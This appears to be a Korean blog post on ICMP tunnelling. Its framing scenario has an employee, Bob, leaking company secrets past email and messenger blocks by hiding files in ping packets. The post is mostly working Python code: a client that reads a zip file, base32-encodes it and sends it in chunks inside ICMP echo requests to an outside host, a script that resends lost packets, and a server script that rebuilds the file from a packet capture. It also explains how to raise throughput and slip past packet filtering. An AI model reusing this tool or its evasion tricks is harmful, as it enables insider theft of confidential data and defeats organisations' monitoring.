ICMP(Internet Control Message Protocol)은 TCP/IP에서 IP 패킷을 처리할 때 발생되는 문제를 알려주는 프로토콜이다. 구조는 아래와 같다. Type은 ICMP 메시지 타입, Code는 타입별 세부적인 값, Checksum은 ICMP 헤더의 손상 여부를 확인, Data는 ICMP 메세지를 통해서 보내는 데이터를 뜻한다.
참고자료) https://binaryterms.com/internet-control-message-protocol-version-4-icmpv4.html
ICMP 프로토콜의 Type들 중에 Type 0(Echo reply), Type 8(Echo request)의 데이터 영역에 패킷을 캡슐화하여 전송하는 것이다.
A회사에 재직중인 Bob이 회사 기밀정보를 외부로 유출하고 싶다. 그러나 솔루션에 의해 메일, 메신저 등이 접속이 불가하며 외부로 반출하는 자료는 직책자의 결재를 받아야한다. 다른 방법이 없나 고민을 하던 중 ping이 허용된다는 것을 알게되었고, ping을 전송 시 Data Section에 기밀문서를 byte로 변환 후 보내기로 하였다.
code는 크게 Pinger 클래스와 main으로 이뤄져 있으며 Pinger 클래스 안에 클래스 시작시 초기화 메소드인 init, checksum을 계산하는 do_checksum, 생성된 소켓을 ping으로 전송하는 send_ping, 전송한 ping의 응답을 수신하는 recevie_pong, 소켓을 생성하는 ping_once, 파일을 읽어오는 ping 메소드로 이뤄져 있다.
코드의 실행 구조는 아래와 같다.
main -> 유출할 파일 bytes 단위로 읽기 -> 소켓 생성 -> data section에 데이터를 넣어서 ping 전송 -> 응답 수신
import os
import argparse
import socket
import struct
import select
import time
import base64
seq = 1 # 시퀀스 넘버
ICMP_ECHO_REQUEST = 8
DEFAULT_TIMEOUT = 2
DEFAULT_COUNT = 5
class Pinger(object):
def __init__(self,target_host,count=DEFAULT_COUNT,timeout=DEFAULT_TIMEOUT):
self.target_host = target_host
self.count = count
self.timeout = timeout
def do_checksum(self, source_string):
sum = 0
max_count = (len(source_string)/2)*2
count = 0
while(count < max_count):
val = ord(str(source_string)[count +1])* 256 + ord(str(source_string)[count])
sum = sum + val
sum = sum & 0xffffffff
count = count + 2
if (max_count<len(source_string)):
sum = sum + ord(str(source_string[len(source_string) - 1]))
sum = sum & 0xffffffff
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
answer = ~sum
answer = answer & 0xffff
answer = answer >> 8 | (answer << 8 & 0xff00)
return answer
def send_ping(self, my_socket, ID, lin):
global seq
target_addr = socket.gethostbyname(self.target_host)
my_checksum = 0
# Header is type (8), code (8), checksum (16), id (16), sequence (16)
header = struct.pack('bbHHh',ICMP_ECHO_REQUEST,0,my_checksum,ID,seq)
bytes_In_double = struct.calcsize("d")
data = lin
my_checksum = self.do_checksum(header + data)
header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, seq)
seq += 1
packet = header + data
my_socket.sendto(packet, (target_addr,1))
def receive_pong(self, my_socket, ID, timeout):
time_remaining = timeout
while True:
start_time = time.time()
readable = select.select([my_socket], [],[],time_remaining)
time_spent = (time.time() - start_time)
if (readable[0] == []):
return
time_received = time.time()
recv_packet, addr = my_socket.recvfrom(1024)
icmp_header = recv_packet[20:28]
type, code, checksum, packet_ID, sequence = struct.unpack(
"bbHHh", icmp_header
)
if (packet_ID == ID):
bytes_In_double = struct.calcsize("d")
time_sent = struct.unpack("d", recv_packet[28:28 + bytes_In_double])[0]
return time_received - time_sent
time_remaining = time_remaining - time_spent
if time_remaining <= 0:
return
def ping_once(self,lin):
icmp = socket.getprotobyname('icmp')
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
except socket.error as msg:
print(msg)
raise socket.error(msg)
except Exception as e:
print("[!] Exception %s" %(e))
my_ID = os.getpid() & 0xFFFF
self.send_ping(my_socket, my_ID, lin)
delay = self.receive_pong(my_socket, my_ID, self.timeout)
my_socket.close()
return delay
def ping(self):
with open("../documents/rebound-master.zip",'rb') as f :
lin = f.read()
for i in range(int((len(lin))/5000)+1):
# 인코딩 후 데이터 전송
enclin = base64.b32encode(lin[5000*i:5000*(i+1)])
print("[*] Ping to %s …." %self.target_host)
try :
delay = self.ping_once(enclin)
except socket.gaierror as e:
print (e)
break
if delay == None:
#print (self.timeout)
print("[*] success")
else:
delay= delay * 1000
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='ICMP tunnuling : 데이터 유출 침투테스트중입니다.')
parser.add_argument('--target-host', action="store", dest="target_host", required=True)
given_args = parser.parse_args()
target_host = given_args.target_host
start = time.time()
pinger = Pinger(target_host=target_host)
pinger.ping()
end = time.time()
print(f"[*] 전체 패킷 전송시간: {end - start:.5f} sec")
#sudo python3 client.py --target-host [IP 주소]
(1) 데이터 전송 속도 : 처음에 데이터를 1480byte씩 데이터를 나눠서 보냈더니 한 패킷당 2초씩 걸렸다. 즉, 1mb에 11분정도 걸렸고 100mb에 18시간 정도 걸리는 셈이다. 이 정도 속도면 나름 괜찮다고 생각하고 있었는데, 해커집단 랩서스가 삼성전자를 해킹해 190GB에 이르는 갤럭시 소스코드를 빼냈다는 기사를 접했다. 만약, 이 소스코드에서 190GB 용량의 데이터를 유출하려면 3년이 걸린다. 따라서, 속도를 더 높이기 위한 고민을 했었다. ping 명령어를 찾아보니 0- 65,507까지 data를 담아서 보낼 수 있다고 나와있었다. 따라서, data를 10000bytes씩 끊어서 보내려고 소스코드를 수정했다. 그러나 data의 크기가 너무 크다는 os 에러가 발생하였고, 그 결과 한 패킷당 8000bytes의 데이터를 보내게 되었다.
(2) 패킷 유실 : 처음에는 작은 데이터만 보내느라 패킷 유실을 고려하지 않고 있었다. 그러나, 큰 데이터로 보내 테스트를 하니 패킷이 유실돼 전달받은 데이터를 복원할 수 없는 문제가 발생하였다. 따라서, 데이터를 전달 할때 sequence번호를 추가해 데이터를 전달받은 서버에서 몇번째 패킷이 유실되었는지 확인할 수 있게 하였다. 또한, 만약 3번째 패킷이 유실되었다면 3번째 패킷만 전달할 수 있는 client_loss.py 코드를 작성해 데이터를 정상적으로 전달 받을 수 있도록 하였다.
(3) 패킷 필터링으로 일부 데이터 전송 불가 : 네트워크 차단 장비에서 일부 low 패킷을 필터링해 데이터가 전송이 안되는 경우가 발생했다. 따라서, 이를 base32 인코딩을 통해 우회하여 필터링이 되지 않도록 추가했다.
import os
import argparse
import socket
import struct
import select
import time
import base64
seq = int(input("[*] 유실된 패킷의 sequence 번호를 입력해주세요 : "))
ICMP_ECHO_REQUEST = 8
DEFAULT_TIMEOUT = 2
DEFAULT_COUNT = 5
class Pinger(object):
def __init__(self,target_host,count=DEFAULT_COUNT,timeout=DEFAULT_TIMEOUT):
self.target_host = target_host
self.count = count
self.timeout = timeout
def do_checksum(self, source_string):
sum = 0
max_count = (len(source_string)/2)*2
count = 0
while(count < max_count):
val = ord(str(source_string)[count +1])* 256 + ord(str(source_string)[count])
sum = sum + val
sum = sum & 0xffffffff
count = count + 2
if (max_count<len(source_string)):
sum = sum + ord(str(source_string[len(source_string) - 1]))
sum = sum & 0xffffffff
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
answer = ~sum
answer = answer & 0xffff
answer = answer >> 8 | (answer << 8 & 0xff00)
return answer
def send_ping(self, my_socket, ID, lin):
global seq
target_addr = socket.gethostbyname(self.target_host)
my_checksum = 0
# Header is type (8), code (8), checksum (16), id (16), sequence (16)
header = struct.pack('bbHHh',ICMP_ECHO_REQUEST,0,my_checksum,ID,seq)
bytes_In_double = struct.calcsize("d")
data = lin
my_checksum = self.do_checksum(header + data)
header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, seq)
seq += 1
packet = header + data
my_socket.sendto(packet, (target_addr,1))
def receive_pong(self, my_socket, ID, timeout):
time_remaining = timeout
while True:
start_time = time.time()
readable = select.select([my_socket], [],[],time_remaining)
time_spent = (time.time() - start_time)
if (readable[0] == []):
return
time_received = time.time()
recv_packet, addr = my_socket.recvfrom(1024)
icmp_header = recv_packet[20:28]
type, code, checksum, packet_ID, sequence = struct.unpack(
"bbHHh", icmp_header
)
if (packet_ID == ID):
bytes_In_double = struct.calcsize("d")
time_sent = struct.unpack("d", recv_packet[28:28 + bytes_In_double])[0]
return time_received - time_sent
time_remaining = time_remaining - time_spent
if time_remaining <= 0:
return
def ping_once(self,lin):
icmp = socket.getprotobyname('icmp')
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
except socket.error as msg:
print(msg)
raise socket.error(msg)
except Exception as e:
print("[!] Exception %s" %(e))
my_ID = os.getpid() & 0xFFFF
self.send_ping(my_socket, my_ID, lin)
delay = self.receive_pong(my_socket, my_ID, self.timeout)
my_socket.close()
return delay
def ping(self):
with open("../documents/rebound-master.zip",'rb') as f :
lin = f.read()
# 인코딩 후 데이터 전송
enclin = base64.b32encode(lin[5000*(seq-1):5000*(seq)])
print("[*] Ping to %s …." %self.target_host)
try :
delay = self.ping_once(enclin)
except socket.gaierror as e:
print (e)
if delay == None:
print("[*] success")
else:
delay= delay * 1000
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='ICMP tunnuling : 데이터 유출 침투테스트중입니다.')
parser.add_argument('--target-host', action="store", dest="target_host", required=True)
given_args = parser.parse_args()
target_host = given_args.target_host
start = time.time()
pinger = Pinger(target_host=target_host)
pinger.ping()
end = time.time()
print(f"[*] 전체 패킷 전송시간: {end - start:.5f} sec")
#sudo python3 client_loss.py --target-host [IP 주소]
byte 단위로 ping의 data section에 전달된 데이터를 합쳐서 하나의 문서로 만들어야한다. 따라서, 와이어샤크를 이용해 json 파일로 ICMP 프로토콜로 전달받은 패킷을 추출한 후 이를 server.py 코드를 이용해 data section에 데이터를 추출해 합친 후 파일로 저장한다. 또한, base32로 인코딩해 전달 받은 데이터는 hex값 형태로 저장되어있다. 이를 fromhex() 함수를 이용해 bytes로 변환 후 base32 디코딩을 통해 원본 데이터를 획득한다.
이 코드의 핵심은 json 파일에서 데이터를 추출하는 것에 있다. json 패킷 파일을 분석하면 tree 구조로 데이터가 저장되어 있다. 여기에서 squenece를 나타내는 icmp.seq_le를 추출하여 유실된 패킷을 확인한다. 만약 패킷이 유실되지 않았다면 Data section 값인 data.data를 찾아 반복적으로 저장해 하나의 문자열로 만든다. 그리고 00:0x와 같은 형식으로 되어있어 ':'를 제거 후 hex값을 bytes로 바꾼다. bytes는 base32 디코딩을 통해 원본 데이터를 획득한다.
import json
import sys
import base64
j = 1
encryptedstr=''
with open('../packet/packet4.json') as json_file:
json_data = json.load(json_file)
for i in json_data:
if (j==len(json_data)):
break
sequence = json_data[j-1]["_source"]["layers"]["icmp"]["icmp.seq_le"]
if (sequence == str(j)):
encryptedstr+=json_data[j-1]["_source"]["layers"]["icmp"]["data"]["data.data"]
j = j + 1
elif (sequence != str(j)):
# success flag
flag = False
for h in range(0,len(json_data)) :
if(str(j) == json_data[h]["_source"]["layers"]["icmp"]["icmp.seq_le"]):
encryptedstr+=json_data[h]["_source"]["layers"]["icmp"]["data"]["data.data"]
j = j + 1
flag = True
break
if (not flag):
print("[*] " + str(j) +" is not recevied!!!")
sys.exit(0)
# : 문자 삭제
encryptedstr=encryptedstr.replace(":","")
# hex to bytes
encryptedstr = bytes.fromhex(encryptedstr)
# b32 decode
encryptedstr = base64.b32decode(encryptedstr)
# 파일 저장
file = open('../decryption/decryption_Data_leak_testcode.z02', 'wb')
file.write(encryptedstr)
file.close
print("[*] Successfully saved decrypted file!")
소스코드는 github에 올려났으니 아래 링크에서 확인할 수 있다.
이어지는 글에서 작성한 코드를 가지고 시나리오 대로 실습을 진행해보겠다.
소스코드 ) https://github.com/cseswu17/ICMP-tunneling
참고 자료) https://m.blog.naver.com/joj0315k/221983219273